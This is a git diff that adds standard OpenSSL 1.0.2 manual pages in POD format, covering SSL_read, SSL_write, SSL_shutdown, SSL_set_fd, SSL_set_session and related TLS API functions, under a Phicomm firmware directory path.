+with the same arguments.
+
+=head1 RETURN VALUES
+
+The following return values can occur:
+
+=over 4
+
+=item E<gt>0
+
+The read operation was successful; the return value is the number of
+bytes actually read from the TLS/SSL connection.
+
+=item Z<>0
+
+The read operation was not successful. The reason may either be a clean
+shutdown due to a "close notify" alert sent by the peer (in which case
+the SSL_RECEIVED_SHUTDOWN flag in the ssl shutdown state is set
+(see L<SSL_shutdown(3)|SSL_shutdown(3)>,
+L<SSL_set_shutdown(3)|SSL_set_shutdown(3)>). It is also possible, that
+the peer simply shut down the underlying transport and the shutdown is
+incomplete. Call SSL_get_error() with the return value B<ret> to find out,
+whether an error occurred or the connection was shut down cleanly
+(SSL_ERROR_ZERO_RETURN).
+
+SSLv2 (deprecated) does not support a shutdown alert protocol, so it can
+only be detected, whether the underlying connection was closed. It cannot
+be checked, whether the closure was initiated by the peer or by something
+else.
+
+=item E<lt>0
+
+The read operation was not successful, because either an error occurred
+or action must be taken by the calling process. Call SSL_get_error() with the
+return value B<ret> to find out the reason.
+
+=back
+
+=head1 SEE ALSO
+
+L<SSL_get_error(3)|SSL_get_error(3)>, L<SSL_write(3)|SSL_write(3)>,
+L<SSL_CTX_set_mode(3)|SSL_CTX_set_mode(3)>, L<SSL_CTX_new(3)|SSL_CTX_new(3)>,
+L<SSL_connect(3)|SSL_connect(3)>, L<SSL_accept(3)|SSL_accept(3)>
+L<SSL_set_connect_state(3)|SSL_set_connect_state(3)>,
+L<SSL_pending(3)|SSL_pending(3)>,
+L<SSL_shutdown(3)|SSL_shutdown(3)>, L<SSL_set_shutdown(3)|SSL_set_shutdown(3)>,
+L<ssl(3)|ssl(3)>, L<bio(3)|bio(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_rstate_string.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_rstate_string.pod
new file mode 100644
index 0000000..bdb8a1f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_rstate_string.pod
@@ -0,0 +1,59 @@
+=pod
+
+=head1 NAME
+
+SSL_rstate_string, SSL_rstate_string_long - get textual description of state of an SSL object during read operation
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ const char *SSL_rstate_string(SSL *ssl);
+ const char *SSL_rstate_string_long(SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_rstate_string() returns a 2 letter string indicating the current read state
+of the SSL object B<ssl>.
+
+SSL_rstate_string_long() returns a string indicating the current read state of
+the SSL object B<ssl>.
+
+=head1 NOTES
+
+When performing a read operation, the SSL/TLS engine must parse the record,
+consisting of header and body. When working in a blocking environment,
+SSL_rstate_string[_long]() should always return "RD"/"read done".
+
+This function should only seldom be needed in applications.
+
+=head1 RETURN VALUES
+
+SSL_rstate_string() and SSL_rstate_string_long() can return the following
+values:
+
+=over 4
+
+=item "RH"/"read header"
+
+The header of the record is being evaluated.
+
+=item "RB"/"read body"
+
+The body of the record is being evaluated.
+
+=item "RD"/"read done"
+
+The record has been completely processed.
+
+=item "unknown"/"unknown"
+
+The read state is unknown. This should never happen.
+
+=back
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_session_reused.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_session_reused.pod
new file mode 100644
index 0000000..b09d8a7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_session_reused.pod
@@ -0,0 +1,45 @@
+=pod
+
+=head1 NAME
+
+SSL_session_reused - query whether a reused session was negotiated during handshake
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_session_reused(SSL *ssl);
+
+=head1 DESCRIPTION
+
+Query, whether a reused session was negotiated during the handshake.
+
+=head1 NOTES
+
+During the negotiation, a client can propose to reuse a session. The server
+then looks up the session in its cache. If both client and server agree
+on the session, it will be reused and a flag is being set that can be
+queried by the application.
+
+=head1 RETURN VALUES
+
+The following return values can occur:
+
+=over 4
+
+=item Z<>0
+
+A new session was negotiated.
+
+=item Z<>1
+
+A session was reused.
+
+=back
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_set_session(3)|SSL_set_session(3)>,
+L<SSL_CTX_set_session_cache_mode(3)|SSL_CTX_set_session_cache_mode(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_set_bio.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_set_bio.pod
new file mode 100644
index 0000000..67c9756
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_set_bio.pod
@@ -0,0 +1,34 @@
+=pod
+
+=head1 NAME
+
+SSL_set_bio - connect the SSL object with a BIO
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ void SSL_set_bio(SSL *ssl, BIO *rbio, BIO *wbio);
+
+=head1 DESCRIPTION
+
+SSL_set_bio() connects the BIOs B<rbio> and B<wbio> for the read and write
+operations of the TLS/SSL (encrypted) side of B<ssl>.
+
+The SSL engine inherits the behaviour of B<rbio> and B<wbio>, respectively.
+If a BIO is non-blocking, the B<ssl> will also have non-blocking behaviour.
+
+If there was already a BIO connected to B<ssl>, BIO_free() will be called
+(for both the reading and writing side, if different).
+
+=head1 RETURN VALUES
+
+SSL_set_bio() cannot fail.
+
+=head1 SEE ALSO
+
+L<SSL_get_rbio(3)|SSL_get_rbio(3)>,
+L<SSL_connect(3)|SSL_connect(3)>, L<SSL_accept(3)|SSL_accept(3)>,
+L<SSL_shutdown(3)|SSL_shutdown(3)>, L<ssl(3)|ssl(3)>, L<bio(3)|bio(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_set_connect_state.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_set_connect_state.pod
new file mode 100644
index 0000000..d88a057
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_set_connect_state.pod
@@ -0,0 +1,55 @@
+=pod
+
+=head1 NAME
+
+SSL_set_connect_state, SSL_get_accept_state - prepare SSL object to work in client or server mode
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ void SSL_set_connect_state(SSL *ssl);
+
+ void SSL_set_accept_state(SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_set_connect_state() sets B<ssl> to work in client mode.
+
+SSL_set_accept_state() sets B<ssl> to work in server mode.
+
+=head1 NOTES
+
+When the SSL_CTX object was created with L<SSL_CTX_new(3)|SSL_CTX_new(3)>,
+it was either assigned a dedicated client method, a dedicated server
+method, or a generic method, that can be used for both client and
+server connections. (The method might have been changed with
+L<SSL_CTX_set_ssl_version(3)|SSL_CTX_set_ssl_version(3)> or
+SSL_set_ssl_method().)
+
+When beginning a new handshake, the SSL engine must know whether it must
+call the connect (client) or accept (server) routines. Even though it may
+be clear from the method chosen, whether client or server mode was
+requested, the handshake routines must be explicitly set.
+
+When using the L<SSL_connect(3)|SSL_connect(3)> or
+L<SSL_accept(3)|SSL_accept(3)> routines, the correct handshake
+routines are automatically set. When performing a transparent negotiation
+using L<SSL_write(3)|SSL_write(3)> or L<SSL_read(3)|SSL_read(3)>, the
+handshake routines must be explicitly set in advance using either
+SSL_set_connect_state() or SSL_set_accept_state().
+
+=head1 RETURN VALUES
+
+SSL_set_connect_state() and SSL_set_accept_state() do not return diagnostic
+information.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_new(3)|SSL_new(3)>, L<SSL_CTX_new(3)|SSL_CTX_new(3)>,
+L<SSL_connect(3)|SSL_connect(3)>, L<SSL_accept(3)|SSL_accept(3)>,
+L<SSL_write(3)|SSL_write(3)>, L<SSL_read(3)|SSL_read(3)>,
+L<SSL_do_handshake(3)|SSL_do_handshake(3)>,
+L<SSL_CTX_set_ssl_version(3)|SSL_CTX_set_ssl_version(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_set_fd.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_set_fd.pod
new file mode 100644
index 0000000..1480871
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_set_fd.pod
@@ -0,0 +1,54 @@
+=pod
+
+=head1 NAME
+
+SSL_set_fd - connect the SSL object with a file descriptor
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_set_fd(SSL *ssl, int fd);
+ int SSL_set_rfd(SSL *ssl, int fd);
+ int SSL_set_wfd(SSL *ssl, int fd);
+
+=head1 DESCRIPTION
+
+SSL_set_fd() sets the file descriptor B<fd> as the input/output facility
+for the TLS/SSL (encrypted) side of B<ssl>. B<fd> will typically be the
+socket file descriptor of a network connection.
+
+When performing the operation, a B<socket BIO> is automatically created to
+interface between the B<ssl> and B<fd>. The BIO and hence the SSL engine
+inherit the behaviour of B<fd>. If B<fd> is non-blocking, the B<ssl> will
+also have non-blocking behaviour.
+
+If there was already a BIO connected to B<ssl>, BIO_free() will be called
+(for both the reading and writing side, if different).
+
+SSL_set_rfd() and SSL_set_wfd() perform the respective action, but only
+for the read channel or the write channel, which can be set independently.
+
+=head1 RETURN VALUES
+
+The following return values can occur:
+
+=over 4
+
+=item Z<>0
+
+The operation failed. Check the error stack to find out why.
+
+=item Z<>1
+
+The operation succeeded.
+
+=back
+
+=head1 SEE ALSO
+
+L<SSL_get_fd(3)|SSL_get_fd(3)>, L<SSL_set_bio(3)|SSL_set_bio(3)>,
+L<SSL_connect(3)|SSL_connect(3)>, L<SSL_accept(3)|SSL_accept(3)>,
+L<SSL_shutdown(3)|SSL_shutdown(3)>, L<ssl(3)|ssl(3)> , L<bio(3)|bio(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_set_session.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_set_session.pod
new file mode 100644
index 0000000..197b521
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_set_session.pod
@@ -0,0 +1,57 @@
+=pod
+
+=head1 NAME
+
+SSL_set_session - set a TLS/SSL session to be used during TLS/SSL connect
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_set_session(SSL *ssl, SSL_SESSION *session);
+
+=head1 DESCRIPTION
+
+SSL_set_session() sets B<session> to be used when the TLS/SSL connection
+is to be established. SSL_set_session() is only useful for TLS/SSL clients.
+When the session is set, the reference count of B<session> is incremented
+by 1. If the session is not reused, the reference count is decremented
+again during SSL_connect(). Whether the session was reused can be queried
+with the L<SSL_session_reused(3)|SSL_session_reused(3)> call.
+
+If there is already a session set inside B<ssl> (because it was set with
+SSL_set_session() before or because the same B<ssl> was already used for
+a connection), SSL_SESSION_free() will be called for that session.
+
+=head1 NOTES
+
+SSL_SESSION objects keep internal link information about the session cache
+list, when being inserted into one SSL_CTX object's session cache.
+One SSL_SESSION object, regardless of its reference count, must therefore
+only be used with one SSL_CTX object (and the SSL objects created
+from this SSL_CTX object).
+
+=head1 RETURN VALUES
+
+The following return values can occur:
+
+=over 4
+
+=item Z<>0
+
+The operation failed; check the error stack to find out the reason.
+
+=item Z<>1
+
+The operation succeeded.
+
+=back
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_SESSION_free(3)|SSL_SESSION_free(3)>,
+L<SSL_get_session(3)|SSL_get_session(3)>,
+L<SSL_session_reused(3)|SSL_session_reused(3)>,
+L<SSL_CTX_set_session_cache_mode(3)|SSL_CTX_set_session_cache_mode(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_set_shutdown.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_set_shutdown.pod
new file mode 100644
index 0000000..fe01308
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_set_shutdown.pod
@@ -0,0 +1,72 @@
+=pod
+
+=head1 NAME
+
+SSL_set_shutdown, SSL_get_shutdown - manipulate shutdown state of an SSL connection
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ void SSL_set_shutdown(SSL *ssl, int mode);
+
+ int SSL_get_shutdown(const SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_set_shutdown() sets the shutdown state of B<ssl> to B<mode>.
+
+SSL_get_shutdown() returns the shutdown mode of B<ssl>.
+
+=head1 NOTES
+
+The shutdown state of an ssl connection is a bitmask of:
+
+=over 4
+
+=item Z<>0
+
+No shutdown setting, yet.
+
+=item SSL_SENT_SHUTDOWN
+
+A "close notify" shutdown alert was sent to the peer, the connection is being
+considered closed and the session is closed and correct.
+
+=item SSL_RECEIVED_SHUTDOWN
+
+A shutdown alert was received form the peer, either a normal "close notify"
+or a fatal error.
+
+=back
+
+SSL_SENT_SHUTDOWN and SSL_RECEIVED_SHUTDOWN can be set at the same time.
+
+The shutdown state of the connection is used to determine the state of
+the ssl session. If the session is still open, when
+L<SSL_clear(3)|SSL_clear(3)> or L<SSL_free(3)|SSL_free(3)> is called,
+it is considered bad and removed according to RFC2246.
+The actual condition for a correctly closed session is SSL_SENT_SHUTDOWN
+(according to the TLS RFC, it is acceptable to only send the "close notify"
+alert but to not wait for the peer's answer, when the underlying connection
+is closed).
+SSL_set_shutdown() can be used to set this state without sending a
+close alert to the peer (see L<SSL_shutdown(3)|SSL_shutdown(3)>).
+
+If a "close notify" was received, SSL_RECEIVED_SHUTDOWN will be set,
+for setting SSL_SENT_SHUTDOWN the application must however still call
+L<SSL_shutdown(3)|SSL_shutdown(3)> or SSL_set_shutdown() itself.
+
+=head1 RETURN VALUES
+
+SSL_set_shutdown() does not return diagnostic information.
+
+SSL_get_shutdown() returns the current setting.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_shutdown(3)|SSL_shutdown(3)>,
+L<SSL_CTX_set_quiet_shutdown(3)|SSL_CTX_set_quiet_shutdown(3)>,
+L<SSL_clear(3)|SSL_clear(3)>, L<SSL_free(3)|SSL_free(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_set_verify_result.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_set_verify_result.pod
new file mode 100644
index 0000000..04ab101
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_set_verify_result.pod
@@ -0,0 +1,38 @@
+=pod
+
+=head1 NAME
+
+SSL_set_verify_result - override result of peer certificate verification
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ void SSL_set_verify_result(SSL *ssl, long verify_result);
+
+=head1 DESCRIPTION
+
+SSL_set_verify_result() sets B<verify_result> of the object B<ssl> to be the
+result of the verification of the X509 certificate presented by the peer,
+if any.
+
+=head1 NOTES
+
+SSL_set_verify_result() overrides the verification result. It only changes
+the verification result of the B<ssl> object. It does not become part of the
+established session, so if the session is to be reused later, the original
+value will reappear.
+
+The valid codes for B<verify_result> are documented in L<verify(1)|verify(1)>.
+
+=head1 RETURN VALUES
+
+SSL_set_verify_result() does not provide a return value.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_get_verify_result(3)|SSL_get_verify_result(3)>,
+L<SSL_get_peer_certificate(3)|SSL_get_peer_certificate(3)>,
+L<verify(1)|verify(1)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_shutdown.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_shutdown.pod
new file mode 100644
index 0000000..efbff5a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_shutdown.pod
@@ -0,0 +1,125 @@
+=pod
+
+=head1 NAME
+
+SSL_shutdown - shut down a TLS/SSL connection
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_shutdown(SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_shutdown() shuts down an active TLS/SSL connection. It sends the 
+"close notify" shutdown alert to the peer.
+
+=head1 NOTES
+
+SSL_shutdown() tries to send the "close notify" shutdown alert to the peer.
+Whether the operation succeeds or not, the SSL_SENT_SHUTDOWN flag is set and
+a currently open session is considered closed and good and will be kept in the
+session cache for further reuse.
+
+The shutdown procedure consists of 2 steps: the sending of the "close notify"
+shutdown alert and the reception of the peer's "close notify" shutdown
+alert. According to the TLS standard, it is acceptable for an application
+to only send its shutdown alert and then close the underlying connection
+without waiting for the peer's response (this way resources can be saved,
+as the process can already terminate or serve another connection).
+When the underlying connection shall be used for more communications, the
+complete shutdown procedure (bidirectional "close notify" alerts) must be
+performed, so that the peers stay synchronized.
+
+SSL_shutdown() supports both uni- and bidirectional shutdown by its 2 step
+behaviour.
+
+=over 4
+
+=item When the application is the first party to send the "close notify"
+alert, SSL_shutdown() will only send the alert and then set the
+SSL_SENT_SHUTDOWN flag (so that the session is considered good and will
+be kept in cache). SSL_shutdown() will then return with 0. If a unidirectional
+shutdown is enough (the underlying connection shall be closed anyway), this
+first call to SSL_shutdown() is sufficient. In order to complete the
+bidirectional shutdown handshake, SSL_shutdown() must be called again.
+The second call will make SSL_shutdown() wait for the peer's "close notify"
+shutdown alert. On success, the second call to SSL_shutdown() will return
+with 1.
+
+=item If the peer already sent the "close notify" alert B<and> it was
+already processed implicitly inside another function
+(L<SSL_read(3)|SSL_read(3)>), the SSL_RECEIVED_SHUTDOWN flag is set.
+SSL_shutdown() will send the "close notify" alert, set the SSL_SENT_SHUTDOWN
+flag and will immediately return with 1.
+Whether SSL_RECEIVED_SHUTDOWN is already set can be checked using the
+SSL_get_shutdown() (see also L<SSL_set_shutdown(3)|SSL_set_shutdown(3)> call.
+
+=back
+
+It is therefore recommended, to check the return value of SSL_shutdown()
+and call SSL_shutdown() again, if the bidirectional shutdown is not yet
+complete (return value of the first call is 0). As the shutdown is not
+specially handled in the SSLv2 protocol, SSL_shutdown() will succeed on
+the first call.
+
+The behaviour of SSL_shutdown() additionally depends on the underlying BIO. 
+
+If the underlying BIO is B<blocking>, SSL_shutdown() will only return once the
+handshake step has been finished or an error occurred.
+
+If the underlying BIO is B<non-blocking>, SSL_shutdown() will also return
+when the underlying BIO could not satisfy the needs of SSL_shutdown()
+to continue the handshake. In this case a call to SSL_get_error() with the
+return value of SSL_shutdown() will yield B<SSL_ERROR_WANT_READ> or
+B<SSL_ERROR_WANT_WRITE>. The calling process then must repeat the call after
+taking appropriate action to satisfy the needs of SSL_shutdown().
+The action depends on the underlying BIO. When using a non-blocking socket,
+nothing is to be done, but select() can be used to check for the required
+condition. When using a buffering BIO, like a BIO pair, data must be written
+into or retrieved out of the BIO before being able to continue.
+
+SSL_shutdown() can be modified to only set the connection to "shutdown"
+state but not actually send the "close notify" alert messages,
+see L<SSL_CTX_set_quiet_shutdown(3)|SSL_CTX_set_quiet_shutdown(3)>.
+When "quiet shutdown" is enabled, SSL_shutdown() will always succeed
+and return 1.
+
+=head1 RETURN VALUES
+
+The following return values can occur:
+
+=over 4
+
+=item Z<>0
+
+The shutdown is not yet finished. Call SSL_shutdown() for a second time,
+if a bidirectional shutdown shall be performed.
+The output of L<SSL_get_error(3)|SSL_get_error(3)> may be misleading, as an
+erroneous SSL_ERROR_SYSCALL may be flagged even though no error occurred.
+
+=item Z<>1
+
+The shutdown was successfully completed. The "close notify" alert was sent
+and the peer's "close notify" alert was received.
+
+=item E<lt>0
+
+The shutdown was not successful because a fatal error occurred either
+at the protocol level or a connection failure occurred. It can also occur if
+action is need to continue the operation for non-blocking BIOs.
+Call L<SSL_get_error(3)|SSL_get_error(3)> with the return value B<ret>
+to find out the reason.
+
+=back
+
+=head1 SEE ALSO
+
+L<SSL_get_error(3)|SSL_get_error(3)>, L<SSL_connect(3)|SSL_connect(3)>,
+L<SSL_accept(3)|SSL_accept(3)>, L<SSL_set_shutdown(3)|SSL_set_shutdown(3)>,
+L<SSL_CTX_set_quiet_shutdown(3)|SSL_CTX_set_quiet_shutdown(3)>,
+L<SSL_clear(3)|SSL_clear(3)>, L<SSL_free(3)|SSL_free(3)>,
+L<ssl(3)|ssl(3)>, L<bio(3)|bio(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_state_string.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_state_string.pod
new file mode 100644
index 0000000..fe25d47
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_state_string.pod
@@ -0,0 +1,45 @@
+=pod
+
+=head1 NAME
+
+SSL_state_string, SSL_state_string_long - get textual description of state of an SSL object
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ const char *SSL_state_string(const SSL *ssl);
+ const char *SSL_state_string_long(const SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_state_string() returns a 6 letter string indicating the current state
+of the SSL object B<ssl>.
+
+SSL_state_string_long() returns a string indicating the current state of
+the SSL object B<ssl>.
+
+=head1 NOTES
+
+During its use, an SSL objects passes several states. The state is internally
+maintained. Querying the state information is not very informative before
+or when a connection has been established. It however can be of significant
+interest during the handshake.
+
+When using non-blocking sockets, the function call performing the handshake
+may return with SSL_ERROR_WANT_READ or SSL_ERROR_WANT_WRITE condition,
+so that SSL_state_string[_long]() may be called.
+
+For both blocking or non-blocking sockets, the details state information
+can be used within the info_callback function set with the
+SSL_set_info_callback() call.
+
+=head1 RETURN VALUES
+
+Detailed description of possible states to be included later.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_CTX_set_info_callback(3)|SSL_CTX_set_info_callback(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_want.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_want.pod
new file mode 100644
index 0000000..c0059c0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_want.pod
@@ -0,0 +1,77 @@
+=pod
+
+=head1 NAME
+
+SSL_want, SSL_want_nothing, SSL_want_read, SSL_want_write, SSL_want_x509_lookup - obtain state information TLS/SSL I/O operation
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_want(const SSL *ssl);
+ int SSL_want_nothing(const SSL *ssl);
+ int SSL_want_read(const SSL *ssl);
+ int SSL_want_write(const SSL *ssl);
+ int SSL_want_x509_lookup(const SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_want() returns state information for the SSL object B<ssl>.
+
+The other SSL_want_*() calls are shortcuts for the possible states returned
+by SSL_want().
+
+=head1 NOTES
+
+SSL_want() examines the internal state information of the SSL object. Its
+return values are similar to that of L<SSL_get_error(3)|SSL_get_error(3)>.
+Unlike L<SSL_get_error(3)|SSL_get_error(3)>, which also evaluates the
+error queue, the results are obtained by examining an internal state flag
+only. The information must therefore only be used for normal operation under
+non-blocking I/O. Error conditions are not handled and must be treated
+using L<SSL_get_error(3)|SSL_get_error(3)>.
+
+The result returned by SSL_want() should always be consistent with
+the result of L<SSL_get_error(3)|SSL_get_error(3)>.
+
+=head1 RETURN VALUES
+
+The following return values can currently occur for SSL_want():
+
+=over 4
+
+=item SSL_NOTHING
+
+There is no data to be written or to be read.
+
+=item SSL_WRITING
+
+There are data in the SSL buffer that must be written to the underlying
+B<BIO> layer in order to complete the actual SSL_*() operation.
+A call to L<SSL_get_error(3)|SSL_get_error(3)> should return
+SSL_ERROR_WANT_WRITE.
+
+=item SSL_READING
+
+More data must be read from the underlying B<BIO> layer in order to
+complete the actual SSL_*() operation.
+A call to L<SSL_get_error(3)|SSL_get_error(3)> should return
+SSL_ERROR_WANT_READ.
+
+=item SSL_X509_LOOKUP
+
+The operation did not complete because an application callback set by
+SSL_CTX_set_client_cert_cb() has asked to be called again.
+A call to L<SSL_get_error(3)|SSL_get_error(3)> should return
+SSL_ERROR_WANT_X509_LOOKUP.
+
+=back
+
+SSL_want_nothing(), SSL_want_read(), SSL_want_write(), SSL_want_x509_lookup()
+return 1, when the corresponding condition is true or 0 otherwise.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<err(3)|err(3)>, L<SSL_get_error(3)|SSL_get_error(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_write.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_write.pod
new file mode 100644
index 0000000..a57617f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_write.pod
@@ -0,0 +1,109 @@
+=pod
+
+=head1 NAME
+
+SSL_write - write bytes to a TLS/SSL connection.
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_write(SSL *ssl, const void *buf, int num);
+
+=head1 DESCRIPTION
+
+SSL_write() writes B<num> bytes from the buffer B<buf> into the specified
+B<ssl> connection.
+
+=head1 NOTES
+
+If necessary, SSL_write() will negotiate a TLS/SSL session, if
+not already explicitly performed by L<SSL_connect(3)|SSL_connect(3)> or
+L<SSL_accept(3)|SSL_accept(3)>. If the
+peer requests a re-negotiation, it will be performed transparently during
+the SSL_write() operation. The behaviour of SSL_write() depends on the
+underlying BIO. 
+
+For the transparent negotiation to succeed, the B<ssl> must have been
+initialized to client or server mode. This is being done by calling
+L<SSL_set_connect_state(3)|SSL_set_connect_state(3)> or SSL_set_accept_state()
+before the first call to an L<SSL_read(3)|SSL_read(3)> or SSL_write() function.
+
+If the underlying BIO is B<blocking>, SSL_write() will only return, once the
+write operation has been finished or an error occurred, except when a
+renegotiation take place, in which case a SSL_ERROR_WANT_READ may occur. 
+This behaviour can be controlled with the SSL_MODE_AUTO_RETRY flag of the
+L<SSL_CTX_set_mode(3)|SSL_CTX_set_mode(3)> call.
+
+If the underlying BIO is B<non-blocking>, SSL_write() will also return,
+when the underlying BIO could not satisfy the needs of SSL_write()
+to continue the operation. In this case a call to
+L<SSL_get_error(3)|SSL_get_error(3)> with the
+return value of SSL_write() will yield B<SSL_ERROR_WANT_READ> or
+B<SSL_ERROR_WANT_WRITE>. As at any time a re-negotiation is possible, a
+call to SSL_write() can also cause read operations! The calling process
+then must repeat the call after taking appropriate action to satisfy the
+needs of SSL_write(). The action depends on the underlying BIO. When using a
+non-blocking socket, nothing is to be done, but select() can be used to check
+for the required condition. When using a buffering BIO, like a BIO pair, data
+must be written into or retrieved out of the BIO before being able to continue.
+
+SSL_write() will only return with success, when the complete contents
+of B<buf> of length B<num> has been written. This default behaviour
+can be changed with the SSL_MODE_ENABLE_PARTIAL_WRITE option of
+L<SSL_CTX_set_mode(3)|SSL_CTX_set_mode(3)>. When this flag is set,
+SSL_write() will also return with success, when a partial write has been
+successfully completed. In this case the SSL_write() operation is considered
+completed. The bytes are sent and a new SSL_write() operation with a new
+buffer (with the already sent bytes removed) must be started.
+A partial write is performed with the size of a message block, which is
+16kB for SSLv3/TLSv1.
+
+=head1 WARNING
+
+When an SSL_write() operation has to be repeated because of
+B<SSL_ERROR_WANT_READ> or B<SSL_ERROR_WANT_WRITE>, it must be repeated
+with the same arguments.
+
+When calling SSL_write() with num=0 bytes to be sent the behaviour is
+undefined.
+
+=head1 RETURN VALUES
+
+The following return values can occur:
+
+=over 4
+
+=item E<gt>0
+
+The write operation was successful, the return value is the number of
+bytes actually written to the TLS/SSL connection.
+
+=item Z<>0
+
+The write operation was not successful. Probably the underlying connection
+was closed. Call SSL_get_error() with the return value B<ret> to find out,
+whether an error occurred or the connection was shut down cleanly
+(SSL_ERROR_ZERO_RETURN).
+
+SSLv2 (deprecated) does not support a shutdown alert protocol, so it can
+only be detected, whether the underlying connection was closed. It cannot
+be checked, why the closure happened.
+
+=item E<lt>0
+
+The write operation was not successful, because either an error occurred
+or action must be taken by the calling process. Call SSL_get_error() with the
+return value B<ret> to find out the reason.
+
+=back
+
+=head1 SEE ALSO
+
+L<SSL_get_error(3)|SSL_get_error(3)>, L<SSL_read(3)|SSL_read(3)>,
+L<SSL_CTX_set_mode(3)|SSL_CTX_set_mode(3)>, L<SSL_CTX_new(3)|SSL_CTX_new(3)>,
+L<SSL_connect(3)|SSL_connect(3)>, L<SSL_accept(3)|SSL_accept(3)>
+L<SSL_set_connect_state(3)|SSL_set_connect_state(3)>,
+L<ssl(3)|ssl(3)>, L<bio(3)|bio(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/d2i_SSL_SESSION.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/d2i_SSL_SESSION.pod
new file mode 100644
index 0000000..bce06e2
